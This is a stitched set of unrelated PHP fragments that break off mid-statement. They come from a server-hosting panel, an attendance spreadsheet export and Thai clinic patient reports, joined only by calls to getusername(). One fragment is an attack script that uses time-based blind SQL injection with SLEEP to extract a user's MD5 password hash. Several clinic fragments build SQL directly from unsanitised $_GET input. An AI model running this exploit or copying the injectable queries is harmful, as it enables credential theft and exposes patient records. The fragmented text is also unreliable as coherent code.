$pserver = 'server/'; } else { if ($protected == 'Y' and $pallowed == 'Y') { $ftpshorten = $row['shorten']; $username = $username . '-p'; $ftppass = $row['dpftppass']; $pserver = ''; } else { $ftpshorten = $row['shorten']; $pserver = 'server/'; } } } $query = $sql->prepare("SELECT g.`protected`,g.`homeLabel`,t.`configs`,s.`id` FROM `gsswitch` g INNER JOIN `serverlist` s ON g.`serverid`=s.`id` INNER JOIN `servertypes` t ON s.`servertype`=t.`id` WHERE g.`id`=? AND g.`userid`=? AND g.`resellerid`=? LIMIT 1"); $query->execute(array($id, $user_id, $resellerLockupID)); $customer = getusername($user_id); while ($row = $query->fetch(PDO::FETCH_ASSOC)) { $serverID = $row['id']; $protected = $row['protected']; $homeLabel = $row['homeLabel']; $config_rows = explode("\r\n", $row['configs']); foreach ($config_rows as $configline) { $data_explode = explode(" ", $configline); $permission = isset($data_explode[1]) ? $data_explode[1] : 'full'; if ($data_explode[0] != '') { $configs[] = array('permission' => $permission, 'line' => $data_explode[0]); $configCheck[] = $data_explode[0]; } } } $query = $sql->prepare("SELECT a.`configs`,a.`paddon` FROM `addons_installed` i INNER JOIN `addons` a ON i.`addonid`=a.`id` WHERE i.`serverid`=? AND i.`userid`=? AND i.`resellerid`=?");
} } if ($ui->w('action', 4, 'post') and !token(true)) { $template_file = $spracheResponse->token; } else { if ($ui->st('d', 'get') == 'md' and $ui->id('id', 10, 'get') and (!isset($_SESSION['sID']) or in_array($ui->id('id', 10, 'get'), $substituteAccess['vd']))) { $id = $ui->id('id', 10, 'get'); if (!$ui->smallletters('action', 2, 'post')) { $query = $sql->prepare("SELECT d.`dnsID`,d.`dns`,d.`ip`,d.`port`,t.`defaultdns`,CASE WHEN t.`connect_ip_only`='Y' THEN `external_ip` ELSE `ssh2ip` END AS `dns_ip` FROM `voice_dns` d INNER JOIN `voice_tsdns` t ON d.`tsdnsID`=t.`id` WHERE d.`active`='Y' AND d.`dnsID`=? AND d.`resellerID`=? LIMIT 1"); $query->execute(array($id, $reseller_id)); while ($row = $query->fetch(PDO::FETCH_ASSOC)) { $dnsIp = $row['dns_ip']; $dns = $row['dns']; $ip = $row['ip']; $port = $row['port']; $defaultdns = strtolower($row['dnsID'] . '-' . getusername($user_id) . $row['defaultdns']); } $template_file = isset($dns) ? 'userpanel_voiceserver_dns_md.tpl' : 'userpanel_404.tpl'; } else { if ($ui->smallletters('action', 2, 'post') == 'md') { $query = $sql->prepare("SELECT d.`tsdnsID`,d.`dnsID`,d.`dns`,d.`ip`,d.`port`,t.`defaultdns` FROM `voice_dns` d INNER JOIN `voice_tsdns` t ON d.`tsdnsID`=t.`id` WHERE d.`active`='Y' AND d.`dnsID`=? AND d.`resellerID`=? LIMIT 1"); $query->execute(array($id, $reseller_id)); while ($row = $query->fetch(PDO::FETCH_ASSOC)) { $tsdnsID = $row['tsdnsID']; $olddns = $row['dns']; $oldip = $row['ip']; $oldport = $row['port']; } if (isset($olddns)) { $error = array(); if ($ui->ip('ip', 'post')) {
} } if ($argv[$i] == "-t") { if (isset($argv[$i + 1]) && !in_array($argv[$i + 1], $opt)) { $prefix = $argv[++$i]; } } } if (!login()) { print "\n[-] Trying to register with username '{$username}' and password '{$password}'\n"; register(); if (!login()) { die("\n[-] Login failed!\n"); } } $user = getusername($uid); print "\n[-] Username: {$user}"; $hash = array(0, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 97, 98, 99, 100, 101, 102); $index = 1; $md5 = ""; print "\n[-] MD5 Hash: "; while (!strpos($md5, chr(0))) { for ($i = 0, $n = count($hash); $i <= $n; $i++) { if ($i == $n) { die("\n\n[-] Exploit failed...\n"); } $sql = "'OR(SELECT IF(ORD(SUBSTR(user_password,{$index},1))={$hash[$i]},SLEEP({$count}),1) FROM {$prefix}_users WHERE user_id={$uid})#"; if (getdelay($sql) >= $count * 1000) { $md5 .= chr($hash[$i]); print chr($hash[$i]); break;
$query = $sql->prepare("UPDATE `tickets` SET `state`='R' WHERE `id`=? AND `resellerid`=? AND `state`='D' LIMIT 1"); $query->execute(array($id, $resellerid)); $template_file = $query->rowCount() > 0 ? $spracheResponse->table_add : 'admin_404.tpl'; } else { if (!$ui->smallletters('action', 2, 'post') or $ui->smallletters('action', 2, 'get') == 'md') { $table = array(); $default_language = $rSA['language']; $query = $sql->prepare("SELECT * FROM `tickets` WHERE `id`=? AND `resellerid`=? LIMIT 1"); $query2 = $sql->prepare("SELECT * FROM `tickets_text` WHERE `ticketID`=? AND `resellerID`=? ORDER BY `writeDate`"); $query3 = $sql->prepare("SELECT `text` FROM `translations` WHERE `type`='ti' AND `lang`=? AND `transID`=? AND `resellerID`=? LIMIT 1"); $query4 = $sql->prepare("SELECT `topic` FROM `ticket_topics` WHERE `id`=? AND `resellerid`=? LIMIT 1"); $query->execute(array($id, $resellerid)); while ($row = $query->fetch(PDO::FETCH_ASSOC)) { $query2->execute(array($id, $resellerid)); while ($row2 = $query2->fetch(PDO::FETCH_ASSOC)) { $table[] = array('writedate' => $user_language == 'de' ? date('d.m.Y', strtotime($row2['writeDate'])) : date('Y-m-d', strtotime($row2['writeDate'])), 'writeTime' => date('H:i:s', strtotime($row2['writeDate'])), 'ticket' => nl2br(htmlspecialchars(stripslashes($row2['message']))), 'writer' => getusername($row2['userID'])); } if ($row['userPriority'] == 1) { $priority = $sprache->priority_low; } else { if ($row['userPriority'] == 2) { $priority = $sprache->priority_medium; } else { if ($row['userPriority'] == 3) { $priority = $sprache->priority_high; } else { if ($row['userPriority'] == 4) { $priority = $sprache->priority_very_high; } else { $priority = $sprache->priority_critical; }
include_once "mod.attendance.php"; include_once "ctrl.checklogin.php"; include_once "ctrl.calendar.php"; include_once "ctrl.attendance.php"; mysql_query("set character_set_client='utf8'"); mysql_query("set character_set_results='utf8'"); mysql_query("set collation_connection='utf8_general_ci'"); /** Error reporting */ error_reporting(E_ALL); ini_set('display_errors', TRUE); ini_set('display_startup_errors', TRUE); //$userid = (!isset($_GET['userid']) || $_GET['userid'] == "")?1:$_GET['userid']; $userid = $_GET['uid']; $todaydate = explode("-", date("Y-n-j")); $getCurrentMonth = getCurrentMonth($todaydate, $userid, $db); $getname = getusername($userid, $db); foreach ($getname as $result) { $fname = $result['user_name']; } if (PHP_SAPI == 'cli') { die('This example should only be run from a Web Browser'); } /** Include PHPExcel */ require_once 'Classes/PHPExcel.php'; // Create new PHPExcel object $objPHPExcel = new PHPExcel(); // Set document properties $objPHPExcel->getProperties()->setCreator("Rubbersoul")->setLastModifiedBy("Maarten Balliauw")->setTitle("Office 2007 XLSX Test Document")->setSubject("Office 2007 XLSX Test Document")->setDescription("Test document for Office 2007 XLSX, generated using PHP classes.")->setKeywords("office 2007 openxml php")->setCategory("Test result file"); $hrow = 1; $objPHPExcel->setActiveSheetIndex(0)->setCellValue('A' . $hrow, '日付')->setCellValue('B' . $hrow, '曜日')->setCellValue('C' . $hrow, '出社時間')->setCellValue('D' . $hrow, '遅刻')->setCellValue('E' . $hrow, '退社時間')->setCellValue('F' . $hrow, '早退')->setCellValue('G' . $hrow, '作業時間')->setCellValue('H' . $hrow, '残業時間')->setCellValue('I' . $hrow, '統計時間'); foreach ($getCurrentMonth as $row) {
} else { $chkston = "เฉพาะOPD (ไม่นับรหัส Z)"; } $str = retdaterangstr($_GET[str]); $sto = retdaterangsto($_GET[str]); $strx = retDatets($str); $stox = retDatets($sto); $sql = "SELECT \nperson.pid,\nperson.idcard,\nCONVERT(concat(ifnull(c.titlename,ifnull(person.prename,'ไม่ระบุ') ),person.fname,' ' ,person.lname) using utf8) as pname,\nhouse.hno,\nhouse.villcode,\nhouse.xgis,\nhouse.ygis,\nv.visitno,\nv.visitdate,\nv.symptoms,\nv.vitalcheck,\nGROUP_CONCAT(visitdiag.diagcode) as gdiagcode,\nGROUP_CONCAT(cdisease.diseasename) as gdiagname,\nGROUP_CONCAT(cdisease.diseasenamethai) as gdiagnamethai,\nv.username\nFROM\nvillage\nINNER JOIN house ON village.pcucode = house.pcucode AND village.villcode = house.villcode\nINNER JOIN person ON house.pcucode = person.pcucodeperson AND house.hcode = person.hcode\nleft join ctitle c on c.titlecode = person.prename\nINNER JOIN visit v ON person.pcucodeperson = v.pcucodeperson AND person.pid = v.pid\nINNER JOIN visitdiag ON v.pcucode = visitdiag.pcucode AND v.visitno = visitdiag.visitno\ninner join cdisease on visitdiag.diagcode = cdisease.diseasecode\nWHERE v.visitdate between '{$str}' and '{$sto}' and (v.flagservice <'04' OR v.flagservice is null OR length(trim(v.flagservice))=0 ) {$wvill} {$chksto}\ngroup by v.pcucode,v.visitno\norder by v.visitdate desc, person.fname"; $result = mysql_query($sql); $txt = '<p align=\'center\'><b>รายชื่อผู้รับบริการ'; $txt .= "<p div align='center' class='text-danger'>ข้อมูลระหว่างวันที่ {$strx} ถึง {$stox} </p></div></b></p><b>{$hosp}</b><br>{$chkston}<table width='99%' border='0' cellspacing='1' cellpadding='1' class='table table-striped table-hover table-bordered'>\n <tr>\n <th width='4%' scope='col'><div align='center'>ลำดับ</div></th>\n\t<th width='4%' scope='col'><div align='center'>HN</div></th>\n\t<th width='9%' scope='col'><div align='center'>เลขบัตรประชาชน</div></th>\n <th width='12%' scope='col'><div align='center'>ชื่อ - สกุล</div></th>\n\t<th width='6%' scope='col'><div 
align='center'>ที่อยู่</div></th>\n\t<th width='8%' scope='col'><div align='center'>วันที่ใช้บริการ</div></th>\n\t<th width='6%' scope='col'><div align='center'>รหัสโรค</div></th>\n <th width='20%' scope='col'><div align='center'>ชื่อโรค</div></th>\n\t<th width='20%' scope='col'><div align='center'>ชื่อโรคภาษาไทย</div></th>\n <th width='8%' scope='col'><div align='center'>ผู้ให้บริการ</div></th>\n </tr>"; while ($row = mysql_fetch_array($result)) { $moo = substr($row[villcode], 6, 2); $vill = getMooVillage($row[villcode]); $sick = retDatets($row[visitdate]); $userservice = getusername($row[username]); ++$x; if ($x % 2 == 1) { $cr = " class='altrow'"; } else { $cr = ""; } $txt .= " <tr {$cr}>\n <td><div align='center'>{$x}</div></td>\n\t<td>{$row['pid']}</td>\n\t<td>{$row['idcard']}</td>\n <td>{$row['pname']}</td>\n\t<td>{$row['hno']} หมู่ที่ {$moo}</td>\n <td><div align='center'>{$sick}</div></td>\n <td>{$row['gdiagcode']}</td>\n\t<td>{$row['gdiagname']}</td>\n\t<td>{$row['gdiagnamethai']}</td>\n <td>{$userservice}</td>\n </tr>"; } $txt .= "</table><br>"; echo $txt; } else { header("Location: ../main/login.php"); } ?>
* Siehe die GNU General Public License fuer weitere Details. * * Sie sollten eine Kopie der GNU General Public License zusammen mit diesem * Programm erhalten haben. Wenn nicht, siehe <http://www.gnu.org/licenses/>. */ if (!isset($user_id) or $main != 1 or isset($user_id) and !$pa['voiceserver']) { header('Location: userpanel.php'); die('No Access'); } include EASYWIDIR . '/stuff/keyphrasefile.php'; include EASYWIDIR . '/stuff/methods/class_ts3.php'; include EASYWIDIR . '/stuff/methods/functions_ssh_exec.php'; include EASYWIDIR . '/stuff/methods/functions_ts3.php'; $sprache = getlanguagefile('voice', $user_language, $reseller_id); $loguserid = $user_id; $logusername = getusername($user_id); $logusertype = 'user'; $logreseller = 0; if (isset($admin_id)) { $logsubuser = $admin_id; } else { if (isset($subuser_id)) { $logsubuser = $subuser_id; } else { $logsubuser = 0; } } if ($ui->st('d', 'get') == 'bu' and $ui->id('id', 10, 'get') and (!isset($_SESSION['sID']) or in_array($ui->id('id', 10, 'get'), $substituteAccess['vo']))) { $id = $ui->id('id', 10, 'get'); $query = $sql->prepare("SELECT v.`id`,v.`ip`,v.`port`,v.`dns`,v.`localserverid`,v.`masterserver`,m.`type`,m.`queryport`,AES_DECRYPT(m.`querypassword`,:aeskey) AS `decryptedquerypassword`,m.`rootid`,m.`addedby`,m.`ssh2ip`,m.`type`,m.`usedns`,m.`publickey`,m.`ssh2ip`,AES_DECRYPT(m.`ssh2port`,:aeskey) AS `decryptedssh2port`,AES_DECRYPT(m.`ssh2user`,:aeskey) AS `decryptedssh2user`,AES_DECRYPT(m.`ssh2password`,:aeskey) AS `decryptedssh2password`,m.`serverdir`,m.`keyname`,m.`notified` FROM `voice_server` v LEFT JOIN `voice_masterserver` m ON v.`masterserver`=m.`id` WHERE v.`active`='Y' AND m.`active`='Y' AND v.`backup`='Y' AND v.`id`=:server_id AND v.`userid`=:user_id AND v.`resellerid`=:reseller_id LIMIT 1"); $query->execute(array(':aeskey' => $aeskey, ':server_id' => $id, ':user_id' => $user_id, ':reseller_id' => $reseller_id));
<?php session_start(); include "../includes/conndb.php"; include "../includes/config.inc.php"; if ($_GET[villcode]) { $villcode = $_GET[villcode]; $user = $_GET[username]; $userperson = getusername($user); $sql = "UPDATE house SET house.usernamedoc = '{$user}' WHERE house.villcode ='{$villcode}'"; $result = mysql_query($sql); $sql = "UPDATE house Inner Join person ON house.pcucode = person.pcucodeperson AND house.hcode = person.hcode SET person.privatedoc = '{$userperson}' WHERE house.villcode ='{$villcode}'"; $result = mysql_query($sql); echo "<div align='center' class='text text-success'>กำหนดหมู่บ้านรับผิดชอบเรียบร้อยแล้ว</div>"; $sql = "SELECT\nCONCAT(convert(village.villno using utf8),' ',`village`.`villname`) AS address,\nconcat(ctitle.titlename,`user`.fname,' ',`user`.lname) as pname\nFROM\nhouse\nInner Join `user` ON house.pcucode = `user`.pcucode AND house.usernamedoc = `user`.username\nInner Join village ON village.villcode = house.villcode AND village.pcucode = house.pcucode\nInner Join ctitle ON `user`.prename = ctitle.titlecode\ngroup by address\norder by villno\n"; $result = mysql_query($sql); $txt = ''; $txt .= "<p align='center'><br><b><center>แสดงรายชื่อเจ้าหน้าที่และหมู่บ้านรับผิดชอบ</b></p></center>"; $txt .= "<center><table class='table table-striped table-hover table-bordered'>\n <tr>\n <th width='8%' scope='col'>ลำดับ</th>\n <th width='25%' scope='col'>ชื่อหมู่บ้าน</th>\n <th width='25%' scope='col'>เจ้าหน้าที่ผู้รับผิดชอบ</th>\n <th width='15%' scope='col'>หมายเหตุ</th>\n </tr>"; while ($row = mysql_fetch_array($result)) { ++$i; if ($i % 2 == 1) { $cr = " class='altrow'"; } else { $cr = ""; } $txt .= " <tr {$cr}>\n <td><div align='center'>{$i}</div></td>\n <td> {$row['address']}</td>\n <td> {$row['pname']}</td>\n <td> </td>\n </tr>"; } $txt .= "</table></center>"; echo $txt; } elseif ($_GET[chk] == 0) {